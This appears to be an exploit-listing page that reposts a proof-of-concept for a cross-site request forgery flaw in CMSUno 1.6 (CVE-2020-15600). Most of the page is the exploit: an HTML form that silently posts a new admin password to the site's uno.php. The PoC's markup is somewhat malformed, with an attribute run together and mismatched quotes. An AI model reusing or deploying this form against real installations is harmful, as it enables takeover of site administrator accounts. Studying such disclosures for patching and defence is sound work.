Advertisement






CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)

CVE Category Price Severity
CWE-352 $500 High
Author Risk Exploitation Type Date
Not specified High Remote 2023-09-15
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090053

Below is a copy:

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-07-22
# Exploit Author: Gh05t666include (AnonGhost Indonesia) 
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC : 

<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=http://127.0.0.1/cmsuno-master/uno.phpmethod=POST>
<input type=hidden name=user value=admin/>
<input type=hidden name=pass value=yourpassword/>
<input type=submit name=user value=Submit request/>
</form>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum